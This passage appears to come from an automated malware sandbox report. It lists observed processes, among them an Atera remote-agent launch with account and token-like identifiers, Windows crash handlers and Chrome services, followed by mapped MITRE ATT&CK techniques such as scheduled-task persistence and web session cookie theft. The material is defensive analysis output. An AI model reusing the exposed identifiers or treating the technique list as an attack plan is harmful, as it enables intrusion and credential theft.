  "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" f74cefd6-e7b9-4ea9-bfc8-9a1a24065183 "7202d73c-f9a0-4e3c-b1bc-6b84dabcf752" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Q2oReIAJ
  2⤵
  PID:5416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 180 -ip 180
1⤵
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 180 -ip 180
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 8452 -ip 8452
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 8424 -ip 8424
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7768 -ip 7768
1⤵
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7768 -ip 7768
1⤵
PID:4880

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4336

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4620

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5924 -ip 5924
1⤵
PID:9000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5924 -ip 5924
1⤵
PID:5776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Authentication Process

Credential Access

Modify Authentication Process

Steal Web Session Cookie

T1539

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery